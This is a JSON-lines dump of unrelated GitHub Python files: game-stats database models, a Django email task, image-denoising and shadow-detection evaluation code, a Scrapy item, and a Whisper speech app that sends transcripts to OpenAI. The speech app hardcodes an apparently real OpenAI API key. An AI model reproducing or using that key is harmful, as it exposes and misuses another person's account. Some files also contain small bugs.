'team'\n id = Column(Integer, primary_key=True)\n name = Column(String)\n external_name = Column(String)\n external_id = Column(Integer)\n team_stats = relationship(\"TeamStats\", backref='team')\n player_stats = relationship('PlayerStats', backref='teams')\n players = relationship('Player', secondary=team_player, backref='teams')\n\n\n def __str__(self):\n return 'id: {}, name: {}, external_name: {}, external_id: {}, team_stats: {}, players {}'.format\\\n (self.id, self.name, self.external_name, self.external_id, self.team_stats, self.players)\n\n\nclass Player(Base, TimestampMixin):\n \"\"\"Player Object\"\"\"\n __tablename__ = 'player'\n id = Column(Integer, primary_key=True)\n name = Column(String)\n role = Column(String)\n image = Column(String)\n external_id = Column(String)\n player_stats = relationship(\"PlayerStats\", backref='player')\n\n\nclass TeamStats(Base, TimestampMixin):\n \"\"\"TeamStats Object\"\"\"\n __tablename__ = 'team_stats'\n id = Column(Integer, primary_key=True)\n total_gold = Column(String)\n won = Column(Boolean)\n color = Column(String)\n deaths = Column(Integer)\n minions_killed = Column(Integer)\n assists = Column(Integer)\n kills = Column(Integer)\n gold = Column(Integer)\n barons = Column(Integer)\n dragons = Column(Integer)\n turrets = Column(Integer)\n team_id = Column(Integer, ForeignKey('team.id'))\n game_id = Column(Integer, ForeignKey('game.id'))\n game_number = Column(Integer)\n\n def __str__(self):\n return 'id: {}, total_gold: {}, won: {}, color: {}, deaths: {}, minions_killed: {}, assists: {}, kills: {},' \\\n 'gold: {}, barons: {}, dragons: {}, team_id: {}, game_number: {}'.format\\\n (self.id, self.total_gold, self.won, self.color, self.deaths, self.minions_killed, self.assists, self.kills,\n self.gold, self.barons, self.dragons, self.team_id, self.game_number)\n\n\nclass PlayerStats(Base, TimestampMixin):\n \"\"\"PlayerStats Object\"\"\"\n __tablename__ = 'player_stats'\n id = Column(Integer, primary_key=True)\n champion_played = Column(String)\n kills = Column(Integer)\n deaths = Column(Integer)\n assists = Column(Integer)\n gold = Column(Integer)\n minions_killed = Column(Integer)\n game_id = Column(Integer, ForeignKey('game.id'))\n team_id = Column(Integer, ForeignKey('team.id'))\n player_id = Column(Integer, ForeignKey('player.id'))\n\n\n\n\nBase.metadata.create_all(engine)\n# print(Base.metadata.sorted_tables)\n# for tbl in reversed(Base.metadata.sorted_tables):\n# print(tbl)\n# engine.execute(tbl.drop())\n","repo_name":"gregorylivschitz/league_playoff_game_predictor","sub_path":"entities/league_of_legends_entities.py","file_name":"league_of_legends_entities.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"19942717805","text":"from django.core.mail import send_mail\nfrom django.conf import settings\n\nfrom celery import shared_task\n\nfrom .utils import new_comment_notification\nfrom api.models import Comment, Post\n\n\n@shared_task\ndef send_email_notifocation(post_id, comment_id):\n '''Send new comments notification'''\n post = Post.objects.select_related(\n 'author', 'root_comment').get(id=post_id)\n comment = Comment.objects.select_related('author').get(id=comment_id)\n\n if not post.author.is_online:\n send_mail(\n 'Your post is commented',\n f'Hey, you got a new comment from user: @{comment.author.username} : {comment.content}',\n settings.EMAIL_INFORMER,\n [post.author.email, ],\n fail_silently=False,\n )\n return 'OK'\n return 'TASK END'\n\n\n@shared_task\ndef add(x, y):\n return x + y","repo_name":"girik108/kvartirka_test","sub_path":"kvartirka/api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3795855433","text":"import torch\r\nfrom torch import nn\r\nimport torch.nn.functional as F\r\n\r\nimport os\r\nimport numpy as np\r\nimport fnmatch\r\nfrom collections import OrderedDict\r\n\r\nimport util.util as util\r\nimport util.index as index\r\nimport models.networks as networks\r\nfrom models import arch, losses\r\n\r\nfrom .base_model import BaseModel\r\nfrom PIL import Image\r\nfrom os.path import join\r\n\r\nimport rawpy\r\nimport util.process as process\r\nfrom torchvision.utils import save_image\r\n\r\ndef tensor2im(image_tensor, visualize=False, video=False): \r\n image_tensor = image_tensor.detach()\r\n\r\n if visualize: \r\n image_tensor = image_tensor[:, 0:3, ...]\r\n\r\n if not video: \r\n image_numpy = image_tensor[0].cpu().float().numpy()\r\n image_numpy = (np.transpose(image_numpy, (1, 2, 0))) * 255.0\r\n else:\r\n image_numpy = image_tensor.cpu().float().numpy()\r\n image_numpy = (np.transpose(image_numpy, (0, 2, 3, 1))) * 255.0\r\n\r\n image_numpy = np.clip(image_numpy, 0, 255)\r\n\r\n return image_numpy\r\n\r\n\r\ndef postprocess_bayer(rawpath, img4c):\r\n img4c = img4c.detach()\r\n img4c = img4c[0].cpu().float().numpy()\r\n img4c = np.clip(img4c, 0, 1)\r\n\r\n #unpack 4 channels to Bayer image\r\n raw = rawpy.imread(rawpath)\r\n raw_pattern = raw.raw_pattern\r\n R = np.where(raw_pattern==0)\r\n G1 = np.where(raw_pattern==1)\r\n G2 = np.where(raw_pattern==3)\r\n B = np.where(raw_pattern==2)\r\n \r\n black_level = np.array(raw.black_level_per_channel)[:,None,None]\r\n\r\n white_point = 16383\r\n\r\n img4c = img4c * (white_point - black_level) + black_level\r\n \r\n img_shape = raw.raw_image_visible.shape\r\n H = img_shape[0]\r\n W = img_shape[1]\r\n\r\n raw.raw_image_visible[R[0][0]:H:2, R[1][0]:W:2] = img4c[0, :,:]\r\n raw.raw_image_visible[G1[0][0]:H:2,G1[1][0]:W:2] = img4c[1, :,:]\r\n raw.raw_image_visible[B[0][0]:H:2,B[1][0]:W:2] = img4c[2, :,:]\r\n raw.raw_image_visible[G2[0][0]:H:2,G2[1][0]:W:2] = img4c[3, :,:]\r\n \r\n # out = raw.postprocess(use_camera_wb=False, user_wb=[1,1,1,1], half_size=True, no_auto_bright=True, output_bps=8, bright=1, user_black=None, user_sat=None)\r\n # out = raw.postprocess(use_camera_wb=False, user_wb=[1.96875, 1, 1.444, 1], half_size=True, no_auto_bright=True, output_bps=8, bright=1, user_black=None, user_sat=None) \r\n out = raw.postprocess(use_camera_wb=True, half_size=True, no_auto_bright=True, output_bps=8, bright=1, user_black=None, user_sat=None)\r\n return out\r\n\r\n\r\ndef postprocess_bayer_v2(rawpath, img4c): \r\n with rawpy.imread(rawpath) as raw:\r\n out_srgb = process.raw2rgb_postprocess(img4c.detach(), raw) \r\n \r\n return out_srgb\r\n\r\n\r\ndef postprocess_xtrans(rawpath, img9c):\r\n img9c = img9c.detach()\r\n img9c = img9c[0].cpu().float().numpy()\r\n img9c = np.clip(img9c, 0, 1)\r\n\r\n #unpack 9 channels to xtrans image\r\n raw = rawpy.imread(rawpath)\r\n img_shape = raw.raw_image_visible.shape\r\n H = (img_shape[0] // 6) * 6\r\n W = (img_shape[1] // 6) * 6\r\n \r\n black_level = 1024\r\n white_point = 16383\r\n\r\n img9c = img9c * (white_point - black_level) + black_level\r\n\r\n # 0 R\r\n raw.raw_image_visible[0:H:6, 0:W:6] = img9c[0, 0::2, 0::2]\r\n raw.raw_image_visible[0:H:6, 4:W:6] = img9c[0, 0::2, 1::2]\r\n raw.raw_image_visible[3:H:6, 1:W:6] = img9c[0, 1::2, 0::2]\r\n raw.raw_image_visible[3:H:6, 3:W:6] = img9c[0, 1::2, 1::2]\r\n\r\n # 1 G\r\n raw.raw_image_visible[0:H:6, 2:W:6] = img9c[1, 0::2, 0::2]\r\n raw.raw_image_visible[0:H:6, 5:W:6] = img9c[1, 0::2, 1::2]\r\n raw.raw_image_visible[3:H:6, 2:W:6] = img9c[1, 1::2, 0::2]\r\n raw.raw_image_visible[3:H:6, 5:W:6] = img9c[1, 1::2, 1::2]\r\n\r\n # 1 B\r\n raw.raw_image_visible[0:H:6, 1:W:6] = img9c[2, 0::2, 0::2]\r\n raw.raw_image_visible[0:H:6, 3:W:6] = img9c[2, 0::2, 1::2]\r\n raw.raw_image_visible[3:H:6, 0:W:6] = img9c[2, 1::2, 0::2]\r\n raw.raw_image_visible[3:H:6, 4:W:6] = img9c[2, 1::2, 1::2]\r\n\r\n # 4 R\r\n raw.raw_image_visible[1:H:6, 2:W:6] = img9c[3, 0::2, 0::2]\r\n raw.raw_image_visible[2:H:6, 5:W:6] = img9c[3, 0::2, 1::2] \r\n raw.raw_image_visible[5:H:6, 2:W:6] = img9c[3, 1::2, 0::2] \r\n raw.raw_image_visible[4:H:6, 5:W:6] = img9c[3, 1::2, 1::2] \r\n\r\n # 5 B\r\n raw.raw_image_visible[2:H:6, 2:W:6] = img9c[4, 0::2, 0::2]\r\n raw.raw_image_visible[1:H:6, 5:W:6] = img9c[4, 0::2, 1::2]\r\n raw.raw_image_visible[4:H:6, 2:W:6] = img9c[4, 1::2, 0::2]\r\n raw.raw_image_visible[5:H:6, 5:W:6] = img9c[4, 1::2, 1::2]\r\n\r\n raw.raw_image_visible[1:H:3, 0:W:3] = img9c[5, :, :]\r\n raw.raw_image_visible[1:H:3, 1:W:3] = img9c[6, :, :]\r\n raw.raw_image_visible[2:H:3, 0:W:3] = img9c[7, :, :]\r\n raw.raw_image_visible[2:H:3, 1:W:3] = img9c[8, :, :]\r\n \r\n out = raw.postprocess(use_camera_wb=True, half_size=True, no_auto_bright=True, output_bps=8, bright=1, user_black=None, user_sat=None)\r\n # out = raw.postprocess(use_camera_wb=True, demosaic_algorithm=rawpy.DemosaicAlgorithm.LINEAR, no_auto_bright=True, output_bps=8, bright=1, user_black=None, user_sat=None)\r\n return out\r\n\r\n\r\nclass IlluminanceCorrect(nn.Module):\r\n def __init__(self):\r\n super(IlluminanceCorrect, self).__init__()\r\n \r\n # Illuminance Correction\r\n def forward(self, predict, source):\r\n if predict.shape[0] != 1:\r\n output = torch.zeros_like(predict)\r\n if source.shape[0] != 1:\r\n for i in range(predict.shape[0]):\r\n output[i:i+1, ...] = self.correct(predict[i:i+1, ...], source[i:i+1, ...]) \r\n else: \r\n for i in range(predict.shape[0]):\r\n output[i:i+1, ...] = self.correct(predict[i:i+1, ...], source) \r\n else:\r\n output = self.correct(predict, source)\r\n return output\r\n\r\n def correct(self, predict, source):\r\n N, C, H, W = predict.shape \r\n predict = torch.clamp(predict, 0, 1)\r\n assert N == 1\r\n output = torch.zeros_like(predict, device=predict.device)\r\n pred_c = predict[source != 1]\r\n source_c = source[source != 1]\r\n \r\n num = torch.dot(pred_c, source_c)\r\n den = torch.dot(pred_c, pred_c) \r\n output = num / den * predict\r\n # print(num / den)\r\n\r\n return output\r\n\r\n\r\nclass ELDModelBase(BaseModel):\r\n def set_input(self, data, mode='train'):\r\n target = None\r\n data_name = None\r\n\r\n mode = mode.lower()\r\n if mode == 'train':\r\n input, target, self.ratio, self.K = data['input'], data['target'], data[\"ratio\"], data[\"K\"]\r\n elif mode == 'eval':\r\n input, target, data_name, self.ratio, self.K = data['input'], data['target'], data['fn'], data[\"ratio\"], data[\"K\"].item()\r\n elif mode == 'test':\r\n input, data_name = data['input'], data['fn']\r\n else:\r\n raise NotImplementedError('Mode [%s] is not implemented' % mode)\r\n \r\n if len(self.gpu_ids) > 0: # transfer data into gpu\r\n input = input.to(device=self.gpu_ids[0])\r\n if target is not None:\r\n target = target.to(device=self.gpu_ids[0]) \r\n\r\n self.input = input\r\n self.target = target\r\n self.data_name = data_name\r\n\r\n self.rawpath = data['rawpath'][0] if 'rawpath' in data else None\r\n self.cfa = data['cfa'][0] if 'cfa' in data else 'bayer'\r\n\r\n # self.issyn = False if 'real' in data else True\r\n self.aligned = False if 'unaligned' in data else True\r\n\r\n \r\n def eval(self, data, savedir=None, suffix=None, correct=False, crop=True, frame_id=None, iter_num=0, old_diffusion=False):\r\n # only the 1st input of the whole minibatch would be evaluated\r\n self._eval()\r\n self.set_input(data, 'eval')\r\n\r\n # if self.data_name is not None and savedir is not None:\r\n # name = os.path.splitext(os.path.basename(self.data_name[0]))[0]\r\n # if not os.path.exists(join(savedir, name)):\r\n # os.makedirs(join(savedir, name))\r\n \r\n # for fn in os.listdir(join(savedir, name)): \r\n # if fnmatch.fnmatch(fn, '*{}_*'.format(self.opt.name)):\r\n # return {}\r\n\r\n with torch.no_grad():\r\n ### evaluate center region to avoid fixed pattern noise\r\n cropx = 512; cropy = 512\r\n if crop:\r\n self.target = util.crop_center(self.target, cropx, cropy)\r\n self.input = util.crop_center(self.input, cropx, cropy)\r\n if not old_diffusion:\r\n if not self.opt.chop:\r\n self.target, para = util.auto_padding(self.target, scale=16)\r\n self.input, para = util.auto_padding(self.input, scale=16)\r\n output_list = self.forward(iter_num=iter_num)\r\n self.output = output_list[0]\r\n else:\r\n ABLATION_NUM = 0\r\n num_steps = 3\r\n if ABLATION_NUM == 0:\r\n def to_photon(x, ratio, K):\r\n # x: 0-1 image\r\n return x/ratio/K*15583\r\n def to_image(x, ratio_next, target_ratio, K):\r\n return x/ratio_next*target_ratio*K/15583\r\n ratio = int(self.ratio)\r\n ratio_list = [1,50, 100]\r\n # ratio_list = [1,2, 3]\r\n # ratio_list =sorted(set(np.logspace(np.log10(1),np.log10(300),num_steps).astype(int)))\r\n # ratio_list =[1,3]\r\n # ratio_list =sorted(set(np.logspace(np.log10(1),np.log10(3),10).astype(float)))\r\n for i in range(len(ratio_list)-1):\r\n output_list = self.forward()\r\n self.output = output_list[0]\r\n ratio_current, ratio_next = ratio_list[i], ratio_list[i+1]\r\n self.input = to_image(to_photon(self.input.clamp(0,1), ratio/ratio_current, self.K) + torch.poisson(to_photon(output.clamp(0,1), ratio/(ratio_next-ratio_current), self.K)), ratio_next, ratio, self.K)\r\n \r\n # self.input = to_image(to_photon(self.input, ratio, self.K)*ratio_current + to_photon(output, ratio, self.K)*(ratio_next-ratio_current), ratio_next, ratio, self.K)\r\n output_list = self.forward()\r\n self.output = output[0]\r\n # elif ABLATION_NUM == 1:\r\n # for i in range(num_steps):\r\n # self.input = self.forward()\r\n # self.output=self.input\r\n \r\n # elif ABLATION_NUM == 2:\r\n # original_input = self.input\r\n # for i in range(1,num_steps+1):\r\n # self.output = self.forward()\r\n # self.input = self.output * i/num_steps + (num_steps-i)/num_steps*original_input\r\n\r\n if not self.opt.chop:\r\n self.input = F.pad(self.input, para)\r\n self.target = F.pad(self.target, para)\r\n self.output = F.pad(self.output, para)\r\n if correct:\r\n self.output = self.corrector(self.output, self.target)\r\n \r\n if self.opt.stage_out == 'raw' and self.opt.stage_eval == 'srgb':\r\n target = postprocess_bayer_v2(self.rawpath, self.target)\r\n output = postprocess_bayer_v2(self.rawpath, self.output)\r\n input = postprocess_bayer_v2(self.rawpath, self.input)\r\n else:\r\n output = self.output\r\n target = self.target\r\n input = self.input\r\n\r\n output = tensor2im(output)\r\n target = tensor2im(target) \r\n input = tensor2im(input)\r\n\r\n if target.shape[0] != output.shape[0]:\r\n target = np.repeat(target, output.shape[0], axis=0)\r\n\r\n res = index.quality_assess(output, target, data_range=255)\r\n res_in = index.quality_assess(input, target, data_range=255) \r\n\r\n if savedir is not None and not crop:\r\n ## raw postprocessing\r\n if self.rawpath:\r\n if self.cfa == 'bayer':\r\n output = postprocess_bayer(self.rawpath, self.output)\r\n target = postprocess_bayer(self.rawpath, self.target)\r\n input = postprocess_bayer(self.rawpath, self.input)\r\n\r\n # target = tensor2im(postprocess_bayer_v2(self.rawpath, self.target))\r\n # output = tensor2im(postprocess_bayer_v2(self.rawpath, self.output))\r\n # input = tensor2im(postprocess_bayer_v2(self.rawpath, self.input))\r\n\r\n elif self.cfa == 'xtrans':\r\n output = postprocess_xtrans(self.rawpath, self.output)\r\n target = postprocess_xtrans(self.rawpath, self.target)\r\n input = postprocess_xtrans(self.rawpath, self.input)\r\n else:\r\n raise NotImplementedError\r\n\r\n if self.data_name is not None:\r\n if \"ELD\" in self.data_name[0]:\r\n name = \"_\".join(self.data_name[0].split(\"/\")[-2:]).split(\".\")[0]\r\n else:\r\n name = os.path.splitext(os.path.basename(self.data_name[0]))[0]\r\n\r\n if not os.path.exists(join(savedir, name)):\r\n os.makedirs(join(savedir, name))\r\n\r\n if frame_id is not None:\r\n if not os.path.exists(join(savedir, name, self.opt.name)):\r\n os.makedirs(join(savedir, name, self.opt.name))\r\n\r\n if not os.path.exists(join(savedir, name, 'input')):\r\n os.makedirs(join(savedir, name, 'input')) \r\n\r\n Image.fromarray(output.astype(np.uint8)).save(join(savedir, name, self.opt.name, '{}_{:.2f}.png'.format(frame_id, res['PSNR'])))\r\n\r\n if not os.path.exists(join(savedir, name, 'input', '{}_{:.2f}.png'.format(frame_id, res_in['PSNR']))):\r\n Image.fromarray(input.astype(np.uint8)).save(join(savedir, name, 'input', '{}_{:.2f}.png'.format(frame_id, res_in['PSNR'])))\r\n\r\n if not os.path.exists(join(savedir, name, 'label')):\r\n os.makedirs(join(savedir, name, 'label')) \r\n\r\n if not os.path.exists(join(savedir, name, 'label', '{}.png'.format(frame_id))):\r\n Image.fromarray(target.astype(np.uint8)).save(join(savedir, name, 'label', '{}.png'.format(frame_id)))\r\n else:\r\n if suffix is not None:\r\n Image.fromarray(output.astype(np.uint8)).save(join(savedir, name,'{}_{:.1f}_{}.png'.format(self.opt.name, res['PSNR'], suffix)))\r\n # Image.fromarray(output.astype(np.uint8)).save(join(savedir, name,'{}_{:.1f}_{}.jpg'.format(self.opt.name, res['PSNR'], suffix)), optimize=True, quality=90)\r\n Image.fromarray(input.astype(np.uint8)).save(join(savedir, name, 'm_input_{}.png'.format(suffix)))\r\n # Image.fromarray(input.astype(np.uint8)).save(join(savedir, name, 'm_input_{}.jpg'.format(suffix)), optimize=True, quality=90)\r\n else:\r\n # Image.fromarray(output.astype(np.uint8)).save(join(savedir, name, '{}_{:.1f}.jpg'.format(self.opt.name, res['PSNR'])), optimize=True, quality=90)\r\n Image.fromarray(output.astype(np.uint8)).save(join(savedir, name, '{}_{:.2f}_{:.2f}.png'.format(self.opt.model_path.split(\"/\")[-2], res['PSNR'], res['SSIM'])))\r\n # Image.fromarray(output.astype(np.uint8)).save(join(savedir, name, '{}.png'.format(self.opt.name)))\r\n Image.fromarray(input.astype(np.uint8)).save(join(savedir, name, 'm_input_{:.2f}_{:.2f}.png'.format(res_in['PSNR'], res_in['SSIM'])))\r\n # Image.fromarray(input.astype(np.uint8)).save(join(savedir, name, 'm_input.jpg'), optimize=True, quality=90)\r\n \r\n Image.fromarray(target.astype(np.uint8)).save(join(savedir, name, 't_label.png'))\r\n # Image.fromarray(target.astype(np.uint8)).save(join(savedir, name, 't_label.jpg'), optimize=True, quality=90)\r\n\r\n return res\r\n\r\n def test(self, data, savedir=None, video_mode=False):\r\n # only the 1st input of the whole minibatch would be evaluated\r\n self._eval()\r\n self.set_input(data, 'test')\r\n\r\n if self.data_name is not None and savedir is not None:\r\n name = os.path.splitext(os.path.basename(self.data_name[0]))[0]\r\n if not video_mode:\r\n if not os.path.exists(join(savedir, name)):\r\n os.makedirs(join(savedir, name))\r\n\r\n # if os.path.exists(join(savedir, name, '{}.png'.format(self.opt.name))):\r\n for fn in os.listdir(join(savedir, name)):\r\n if fnmatch.fnmatch(fn, '*{}_*'.format(self.opt.name)):\r\n return\r\n else:\r\n if not os.path.exists(join(savedir, self.opt.name)):\r\n os.makedirs(join(savedir, self.opt.name))\r\n \r\n with torch.no_grad():\r\n output = self.forward()\r\n \r\n # if self.opt.netG == 'fastdvd': # video network \r\n # self.input = self.input[:, 8:12, ...]\r\n\r\n ## raw postprocessing\r\n if self.rawpath:\r\n if self.opt.stage_in == 'srgb':\r\n output = tensor2im(self.output)\r\n input = tensor2im(self.input)\r\n else:\r\n output = postprocess_bayer(self.rawpath, self.output)\r\n input = postprocess_bayer(self.rawpath, self.input) \r\n\r\n if not video_mode:\r\n Image.fromarray(output.astype(np.uint8)).save(join(savedir, name,'{}.jpg'.format(self.opt.name)), optimize=True, quality=90)\r\n Image.fromarray(input.astype(np.uint8)).save(join(savedir, name, 'm_input.jpg'), optimize=True, quality=90)\r\n else:\r\n Image.fromarray(output.astype(np.uint8)).save(join(savedir, self.opt.name,'{}.jpg'.format(name)), optimize=True, quality=90)\r\n\r\n return output","repo_name":"mm2319/Test","sub_path":"denoising-diffusion-gan/ELD_model.py","file_name":"ELD_model.py","file_ext":"py","file_size_in_byte":18722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19249063650","text":"import numpy as np\nimport pandas as pd\nimport cv2\nimport random\nimport os\nimport matplotlib.pyplot as plt\npath = './data/5005labels.csv'\nha = pd.read_csv(open(path))\nid = 0\ndef imgarr(imgpath):\n img=cv2.imread(imgpath)\n return img\n\ndef siamese_fetch_img(BASE_DIR,label,labeldata,pathdata,kind):\n if(kind==0):\n pathdata1=pathdata[labeldata!=label]\n # print('pathdata1:',pathdata1)\n\n else:\n pathdata1=pathdata[labeldata==label]\n # print('pathdata1:', pathdata1)\n rndid=random.randint(0,len(pathdata1)-1)\n path=BASE_DIR+labeldata[pathdata1.index[rndid]]+'\\\\'+pathdata1[pathdata1.index[rndid]]\n id = ha[ha['labels'] == labeldata[pathdata1.index[rndid]]]['Id'].iloc[0]\n label = np.zeros((1, 5005))\n label[0, id] = 1\n # print('po ne label:',id)\n # print(path)\n # print(os.path.exists(path))\n img=imgarr(path)\n return img,label\n\n","repo_name":"PengLiuRu/Humpback-whale-identification","sub_path":"fectchimage.py","file_name":"fectchimage.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11167378201","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\n\nclass EdxSpiderItem(scrapy.Item):\n language = Field()\n title = Field()\n shortdes = Field()\n url = Field()\n level = Field()\n image = Field()\n weektocomplete = Field()\n org = Field()\n key = Field()\n instructorsname = Field()\n instructorsposition = Field()\n instructorsorg = Field()\n instructorsimage = Field()\n prerequisites = Field()\n syllabus = Field()\n whatyouwilllearn = Field()\n","repo_name":"mexi-messi/abcdef","sub_path":"itec-core/Crawl Robot/edx_spider/edx_spider/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19493412485","text":"import numpy as np\r\nimport os\r\nfrom PIL import Image\r\nfrom tqdm import tqdm\r\nfrom medpy import metric\r\nimport argparse\r\n\r\n\r\nclass AvgMeter(object):\r\n def __init__(self):\r\n self.reset()\r\n\r\n def reset(self):\r\n self.val = 0\r\n self.avg = 0\r\n self.sum = 0\r\n self.count = 0\r\n\r\n def update(self, val, n=1):\r\n self.val = val\r\n self.sum += val * n\r\n self.count += n\r\n self.avg = self.sum / self.count\r\n\r\ndef cal_precision_recall_mae(prediction, gt):\r\n assert prediction.dtype == np.uint8\r\n assert gt.dtype == np.uint8\r\n assert prediction.shape == gt.shape\r\n\r\n eps = 1e-4\r\n\r\n prediction = prediction / 255.\r\n gt = gt / 255.\r\n\r\n prediction_bool = (prediction > 0.5)\r\n gt_bool = (gt > 0.5)\r\n prediction_bool = prediction_bool.astype(np.float)\r\n gt_bool = gt_bool.astype(np.float)\r\n\r\n mae = np.mean(np.abs(prediction_bool - gt_bool))\r\n\r\n hard_gt = np.zeros(prediction.shape)\r\n hard_gt[gt > 0.5] = 1\r\n t = np.sum(hard_gt)\r\n\r\n precision, recall = [], []\r\n for threshold in range(256):\r\n threshold = threshold / 255.\r\n\r\n hard_prediction = np.zeros(prediction.shape)\r\n hard_prediction[prediction > threshold] = 1\r\n\r\n tp = np.sum(hard_prediction * hard_gt)\r\n p = np.sum(hard_prediction)\r\n\r\n precision.append((tp + eps) / (p + eps))\r\n recall.append((tp + eps) / (t + eps))\r\n\r\n return precision, recall, mae\r\n\r\ndef cal_fmeasure(precision, recall):\r\n assert len(precision) == 256\r\n assert len(recall) == 256\r\n beta_square = 0.3\r\n max_fmeasure = max([(1 + beta_square) * p * r / (beta_square * p + r) for p, r in zip(precision, recall)])\r\n\r\n return max_fmeasure\r\n\r\ndef cal_Jaccard(prediction, gt):\r\n assert prediction.dtype == np.uint8\r\n assert gt.dtype == np.uint8\r\n assert prediction.shape == gt.shape\r\n\r\n prediction = prediction / 255.\r\n gt = gt / 255.\r\n\r\n pred = (prediction > 0.5)\r\n gt = (gt > 0.5)\r\n Jaccard = metric.binary.jc(pred, gt)\r\n\r\n return Jaccard\r\n\r\ndef cal_BER(prediction, label, thr = 128):\r\n prediction = (prediction > thr)\r\n label = (label > thr)\r\n prediction_tmp = prediction.astype(np.float)\r\n label_tmp = label.astype(np.float)\r\n TP = np.sum(prediction_tmp * label_tmp)\r\n TN = np.sum((1 - prediction_tmp) * (1 - label_tmp))\r\n Np = np.sum(label_tmp)\r\n Nn = np.sum((1-label_tmp))\r\n BER = 0.5 * (2 - TP / Np - TN / Nn) * 100\r\n shadow_BER = (1 - TP / Np) * 100\r\n non_shadow_BER = (1 - TN / Nn) * 100\r\n \r\n return BER, shadow_BER, non_shadow_BER\r\n\r\nif __name__ == '__main__':\r\n\r\n parser = argparse.ArgumentParser(description='PyTorch Training')\r\n\r\n parser.add_argument('-gp', '--gt_path', type=str, default='./data/DS/test/')\r\n parser.add_argument('-pp', '--pred_path', type=str, default='./result/MTMT-SSL/DS/')\r\n parser.set_defaults(bottleneck=True)\r\n args = parser.parse_args()\r\n\r\n gt_path = args.gt_path\r\n pred_path = args.pred_path \r\n\r\n print('evalute the predictions: ', pred_path)\r\n\r\n precision_record, recall_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]\r\n mae_record = AvgMeter()\r\n Jaccard_record = AvgMeter()\r\n BER_record = AvgMeter()\r\n shadow_BER_record = AvgMeter()\r\n non_shadow_BER_record = AvgMeter()\r\n\r\n video_list = os.listdir(pred_path)\r\n\r\n for video in tqdm(video_list):\r\n gt_list = os.listdir(os.path.join(gt_path, 'labels', video)) \r\n img_list = [f for f in os.listdir(os.path.join(pred_path, video))] \r\n img_set = list(set([img.split('/')[-1] for img in img_list])) \r\n for img_prefix in img_set:\r\n\r\n gt = np.array(Image.open(os.path.join(gt_path, 'labels', video, img_prefix)).convert('L'))\r\n\r\n width, height = gt.shape\r\n img = np.array(Image.open(os.path.join(pred_path, video, img_prefix)).convert('L').resize((height, width)))\r\n\r\n if 'DS' in gt_path:\r\n device = np.array(Image.open(os.path.join(gt_path, 'devices', video, img_prefix)).convert('L'))\r\n img = img * ((255 - device)//255)\r\n gt = gt * ((255 - device)//255)\r\n\r\n precision, recall, mae = cal_precision_recall_mae(img, gt)\r\n Jaccard = cal_Jaccard(img, gt)\r\n Jaccard_record.update(Jaccard)\r\n BER, shadow_BER, non_shadow_BER = cal_BER(img, gt)\r\n BER_record.update(BER)\r\n shadow_BER_record.update(shadow_BER)\r\n non_shadow_BER_record.update(non_shadow_BER)\r\n for pidx, pdata in enumerate(zip(precision, recall)):\r\n p, r = pdata\r\n precision_record[pidx].update(p)\r\n recall_record[pidx].update(r)\r\n mae_record.update(mae)\r\n\r\n fmeasure = cal_fmeasure([precord.avg for precord in precision_record],\r\n [rrecord.avg for rrecord in recall_record])\r\n log = 'MAE:{:.3f}, F-beta:{:.3f}, Jaccard:{:.3f}, BER:{:.2f}, SBER:{:.2f}, non-SBER:{:.2f}'.format(mae_record.avg, fmeasure, Jaccard_record.avg, BER_record.avg, shadow_BER_record.avg, non_shadow_BER_record.avg)\r\n print(log)\r\n\r\n\r\n","repo_name":"yihong-97/STICT","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"74309974632","text":"import whisper\r\nimport gradio as gr\r\nimport warnings\r\nimport openai\r\n\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n# Use your API key to authenticate\r\nopenai.api_key = \"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\"\r\n\r\nmodel = whisper.load_model(\"base\")\r\n\r\nmodel.device\r\n\r\ndef transcribe(audio):\r\n # load audio and pad/trim it to fit 30 seconds\r\n audio=whisper.load_audio(audio)\r\n audio=whisper.pad_or_trim(audio)\r\n\r\n # make log-Mel spectrogram and move to the same device as the model\r\n mel = whisper.log_mel_spectrogram(audio).to(model.device)\r\n\r\n # detect the spoken language\r\n _, probs = model.detect_language(mel)\r\n\r\n # decode the audio\r\n #options = whisper.DecodingOptions()\r\n options = whisper.DecodingOptions(fp16=False)\r\n result = whisper.decode(model, mel, options)\r\n result_text = result.text\r\n\r\n # Pass the generated text to Audio\r\n # Use the openai API to generate a response\r\n response = openai.Completion.create(\r\n engine=\"ada\",\r\n prompt=result_text,\r\n max_tokens=1024,\r\n n=1,\r\n temperature=0.5\r\n ).choices[0].text\r\n\r\n out_result = response\r\n print(out_result)\r\n\r\n return [result_text, out_result]\r\n\r\noutput_1 = gr.Textbox(label=\"Speech to Text\")\r\noutput_2 = gr.Textbox(label=\"ChatGPT Output\")\r\n\r\ngr.Interface(\r\n title = 'OpenAI Whisper and ChatGPT ASR Gradio Web UI',\r\n fn=transcribe,\r\n inputs=[\r\n gr.inputs.Audio(source=\"microphone\", type=\"filepath\")\r\n ],\r\n\r\n outputs=[output_1, output_2],\r\n live=True).launch()","repo_name":"eddy961206/py_workspace","sub_path":"py_workspace/secretary.py","file_name":"secretary.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4895664718","text":"import logging\nfrom typing import Any\n\nfrom pydase.data_service.data_service import DataService\n\nlogger = logging.getLogger(__name__)\n\n\nclass NumberSlider(DataService):\n \"\"\"\n This class models a UI slider for a data service, allowing for adjustments of a\n parameter within a specified range and increments.\n\n Parameters:\n -----------\n value 